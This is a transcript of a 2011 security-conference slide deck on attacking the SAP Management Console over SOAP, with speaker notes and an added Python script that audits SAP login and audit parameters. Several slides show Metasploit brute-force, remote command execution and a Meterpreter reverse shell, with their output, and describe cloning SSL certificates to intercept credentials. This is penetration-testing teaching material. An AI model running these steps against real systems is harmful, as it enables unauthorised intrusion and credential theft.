          - Setup your Brute-force just right ;)
        - Hash Types
          - Still supporting those old 8 char hashes?
        - Security Audit Log Enabled ?
          - rsau/enabled (default: 0)
          - Is anybody watching?
  • 63. Process Parameters
        msf auxiliary(sap_mgmt_con_getprocessparameter) > run
        [*] [SAP] Connecting to SAP MC on 172.16.15.128:50013
        [*] [SAP] Attempting to matche (?i-mx:^login/password)
        [SAP] Process Parameters
        Name                                    Value
        ------                                  ----------
        login/password_charset                  1
        login/password_downwards_compatibility  1
        login/password_hash_algorithm           encoding=RFC2307, algorithm=iSSHA-1, saltsize=96
        login/password_max_idle_productive      0
  • 65. Process Parameters
        <SAPControl:GetProcessParameterResponse><parameter>
        <item><name>DIR_AUDIT</name>
        <group>System</group>
        <description>Directory for security audit files</description>
        <unit/><value>E:\usr\sap\NSP\DVEBMGS00\log</value></item>
        <item><name>login/fails_to_user_lock</name>
        <group>Login</group>
        <description>Number of invalid login attempts until user lock</description>
        <unit/><value> 5 </value></item>
        …
  • 67. Information is king
        - Useful Process Parameters
          - rsau/enabled
          - login/password_downwards_compatibility
          - login/failed_user_auto_unlock
          - login/fails_to_user_lock
          - login/min_password_lng
          - login/password_charset
          - ....
        *Check out consolut.com for a great list
  • 68. “I put a whitebox configuration audit in your blackbox penetration test, so you can whitebox SAP while you blackbox it!” Quote by: Me, just now!
  • 70. ALL THE FUNCTIONS SO FAR ARE UNAUTHENTICATED
  • 72. BUT IT'S OK!
  • 80. [Bar chart: Number of SAP servers listening on public addresses, per service: Router, Gateway, SAP MC, SAP MC (SSL); y-axis from 2,500 to 2,700]
  • 82. Some rights reserved by Crystl
  • 84. Basic auth is your friend!
  • 86. MAN IN THE MIDDLE…
  • 87. LET ME COUNT THE WAYS…
  • 89. Getting in the middle
        - Force Authentication
          - Basic Auth == Clear Text
          - Credentials FTW!
        - Alter Requests
          - Do what YOU want
        - Alter Responses
  • 93. SSL PROTECTION 4 MAJOR OPTIONS
  • 94. Getting in the middle: Self Signed
  • 95. Getting in the middle: Device Default
        - Often the same on EVERY device
        - Not an option for SAP
  • 96. Getting in the middle: Enterprise CA
        - You sign your own certs centrally
        - PKI Infrastructure
  • 97. Getting in the middle: Externally signed
        - Diginotar to the rescue!
        - SAP also offer signing services
  • 98. Getting in the middle
        - Impersonate SSL
          - There's a module for that!
          - Metasploit (ssl_impersonate.rb)
        - Creates a fake cert
          - As close to the original as possible
        - Useful SE options
          - Expired yesterday
          - Add CN names for ease of use
  • 99. Getting in the middle
        As near as darn a clone of the original
        Fingerprints + Serial Number differ
  • 100. Getting in the middle
        All CN data is 100% cloned… Average users don't care!
  • 102. PUTTING IT ALL TOGETHER
  • 104. OSExecute
        - SAP MC generously offers OSExecute function
          - Valid username/password req.
          - That's handy!
  • 106. MITM
        - Using the force-auth method
        - Check under the keyboard
          - Post-it notes!
        - Rubber hose method
  • 107. Brute-Force
        - Metasploit module
          - Set SAP SID for SAP specific checks
        - Watch out for lockouts!
          - Denial of Service?
  • 108. Brute Force
        msf auxiliary(sap_mgmt_con_brute_login) > set SAP_SID NSP
        msf auxiliary(sap_mgmt_con_brute_login) > run
        [*] SAPSID set to 'NSP' - Setting default SAP wordlist
        [*] Trying username:'sapservicensp' password:''
        [-] [01/18] - failed to login as 'sapservicensp' password: ''
        [*] Trying username:'sapservicensp' password:'sapserviceNSP'
        [-] [02/18] - failed to login as 'sapadm' password: ''
        [*] Trying username:'nspadm' password:''
        …
  • 109. OSExecute
        auxiliary(sap_..._osexec) > set RHOSTS 172.16.15.128
        auxiliary(sap_..._osexec) > set USERNAME sapservicensp
        auxiliary(sap_..._osexec) > set PASSWORD Pr0d@dm1n
        auxiliary(sap_..._osexec) > set CMD hostname
        auxiliary(sap_..._osexec) > run
        [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
        [+] [SAP] Command run as PID: 1240
        Command output
        --------------
        WINXPSAP-TST
  • 110. THANKS, BUT WE WANT FULL ACCESS!
  • 111. Getting Meterpreter
        - Using tricks built into Metasploit
        - Encode Payload
        - Split it up into chunks
        - Shove it in
        - Start it up!
        - Profit
  • 113. OSExecute Meterpreter
        msf exploit(sap_mgmt_con_osexec_exploit) > exploit
        [*] Started reverse handler on 172.16.15.134:4444
        [*] Command Stager - 7.42% done (7499/101079 bytes)
        ...
        [*] Command Stager - 100.00% done (101079/101079 bytes)
        [*] Meterpreter session 1 opened (172.16.15.134:4444 -> 172.16.15.128:1144) at 2011-10-16 14:41:59 +0200
        meterpreter > getuid
        Server username: WINXPSAP-TST\SAPServiceNSP
  • 117. WHY IS YOUR SAP MC ACCESSIBLE TO THE WORLD!
  • 119. Fixing the issues
        - SAP Fix
          - Note 1439348
          - Issue also discovered by Onapsis
        - No idea what it says!
          - SAP restrict ALL fix info to customers only
  • 120. SAP SECURITY ISN'T ALL ABOUT ROLES
  • 124. CLIENT-SIDE APPS
  • 125. SAP IS COMPLEX TEST IT!
  • 126. Questions ? http://c22.cc contact@c22.cc
  • 127. Big Thanks
        - The REAL SAP Security Researchers
          - Onapsis, DSecRG, Raul Siles, CYBSEC
        - SAP PSRT (for emailing me a lot)
        - DirtySec (You know who you are!)
        - MacLemon (for the PPT-fu)
        - ED
          - For inviting us, even though we cause problems!
        - All the people who helped make this happen
  • 128. Thanks for coming http://c22.cc contact@c22.cc
  • 129. Sorry for sucking so bad! http://c22.cc contact@c22.cc
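The "Process Parameters" slides (62 to 67) show the shape of a GetProcessParameterResponse and list the login and audit parameters worth checking. The following is an added example, not code from the deck, from SAP or from Metasploit, that turns that XML shape into the whitebox configuration check the deck jokes about; the SAPControl namespace URI, the constructed sample items and the pass thresholds are assumptions (an example baseline, not SAP's own guidance).

```python
"""Whitebox check of SAP profile parameters from a GetProcessParameterResponse.

Added example for this page; not code from the SecZone 2011 deck, from SAP or
from Metasploit. The SAPControl namespace URI, the sample items and the pass
thresholds are assumptions (an example baseline, not SAP's own guidance).
"""
import xml.etree.ElementTree as ET

# Constructed sample shaped like the slide's <SAPControl:GetProcessParameterResponse>.
# The namespace URI is assumed (the slide shows only the SAPControl prefix). The
# DIR_AUDIT and login/fails_to_user_lock items are the ones the slide shows; the
# remaining items are constructed so that every check below is exercised.
SAMPLE_RESPONSE = """<SAPControl:GetProcessParameterResponse xmlns:SAPControl="urn:SAPControl">
<parameter>
<item><name>DIR_AUDIT</name><group>System</group>
<description>Directory for security audit files</description>
<unit/><value>E:\\usr\\sap\\NSP\\DVEBMGS00\\log</value></item>
<item><name>login/fails_to_user_lock</name><group>Login</group>
<description>Number of invalid login attempts until user lock</description>
<unit/><value> 5 </value></item>
<item><name>rsau/enabled</name><group>System</group>
<description>constructed</description><unit/><value>0</value></item>
<item><name>login/password_downwards_compatibility</name><group>Login</group>
<description>constructed</description><unit/><value>1</value></item>
<item><name>login/failed_user_auto_unlock</name><group>Login</group>
<description>constructed</description><unit/><value>1</value></item>
<item><name>login/min_password_lng</name><group>Login</group>
<description>constructed</description><unit/><value>6</value></item>
</parameter>
</SAPControl:GetProcessParameterResponse>
"""


def _local(tag):
    """Strip any {namespace} prefix so prefixed and unprefixed tags compare alike."""
    return tag.rsplit("}", 1)[-1]


def parse_parameters(xml_text):
    """Return {parameter name: value} from a GetProcessParameterResponse.

    Values are stripped: the slide shows '<value> 5 </value>' with padding,
    which would otherwise defeat a plain string comparison.
    """
    root = ET.fromstring(xml_text)
    params = {}
    for element in root.iter():
        if _local(element.tag) != "item":
            continue
        fields = {_local(child.tag): (child.text or "").strip() for child in element}
        if fields.get("name"):
            params[fields["name"]] = fields.get("value", "")
    return params


def _as_int(value):
    try:
        return int(value)
    except ValueError:
        return None


# Assumed example baseline, keyed on the parameters the deck lists as worth checking.
# Each entry: (parameter, predicate that is True when the value is acceptable, finding).
CHECKS = [
    ("rsau/enabled", lambda v: v == "1",
     "Security Audit Log not enabled (rsau/enabled != 1): nobody is watching"),
    ("login/password_downwards_compatibility", lambda v: v == "0",
     "downwards-compatible (old 8 char) password hashes still in use"),
    ("login/failed_user_auto_unlock", lambda v: v == "0",
     "users locked by failed logins are unlocked automatically"),
    ("login/fails_to_user_lock", lambda v: _as_int(v) is not None and _as_int(v) <= 5,
     "lock threshold above 5 failed logins gives brute-force more room"),
    ("login/min_password_lng", lambda v: _as_int(v) is not None and _as_int(v) >= 8,
     "minimum password length below 8 shrinks the keyspace"),
]


def audit(params):
    """Return [(parameter, value, finding)] for every check that does not pass.

    A parameter missing from the response is reported too: the instance then
    runs on the default, which for rsau/enabled the deck notes is 0.
    """
    findings = []
    for name, acceptable, finding in CHECKS:
        value = params.get(name)
        if value is None:
            findings.append((name, None, "not present in response; instance runs on the default"))
        elif not acceptable(value):
            findings.append((name, value, finding))
    return findings


if __name__ == "__main__":
    for name, value, finding in audit(parse_parameters(SAMPLE_RESPONSE)):
        print(f"[!] {name} = {value!r}: {finding}")
```

On the constructed sample only login/fails_to_user_lock passes; the other four parameters are flagged.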

Editor's Notes

  1. Yeah… I said that! SAP is a perfect goal for attackers. All the company's crown jewels in one place!
  2. In 2010 SAP released more than 900 fixes… SAP is a complex product, and complex products always have flaws. Research into coding flaws shows 15-50 bugs per 1000 lines of delivered code… not all are security related, but that's still a lot of bugs!
  3. It's not ALL SAP's fault… complex configurations, user error, maintaining backwards compatibility, take your pick. In offering so much SAP are their own worst enemy.
  4. If security never see it, how can they secure it? More importantly, if they don't understand it, how can they ever hope to secure it!
  5. Think about THAT logic for a second! I'm pretty sure every security professional has heard that at one point or another.
  6. So what's this SOAP thing then?
  7. Not a cleaning product! We'll be using it to scrub SAP clean however. I'm sure lots of you have heard of Web Services. Simply XML over HTTP or HTTPS. Flexible (can run over SMTP...). SO HOW DOES SOAP FIT INTO OUR SAP TOPIC?
  9. Yes it's a sad sad world! SAP MC uses a range of unauthenticated requests, but some of the more fun functions require username/password authentication.
  10. Lots of cool data. Lots of cool functions. Lots of fun to be had!
  11. There's pages of this stuff… much too much for a slide… and much too much to make this stuff available for attackers!
  12. dbms_type: The database interface recognizes the type of the database system by the environment variable dbms_type. Possible values: ora, inf, db2, db4, db6, ada, mss. OLDER VERSIONS of SAP can include environment variables such as MSSQL_USER.
  13. Effect of password policies on keyspace reduction (openwall). Different password compliance rules can reduce the overall keyspace considerably!
  20. So I scanned a small country!
  21. What do we have already: Full server environment, Version info, SAP SID, Database info, valid SAP usernames, trace and debug logs.
  22. Wait... SSL will save us!
  23. Yep.. It's a feature remember? But we've already covered how we could get that.
  26. OSExecute is all well and good... Run a single command. Get the response..
  27. Block it. Filter it. Restrict it to administrators. YES this means internally as well!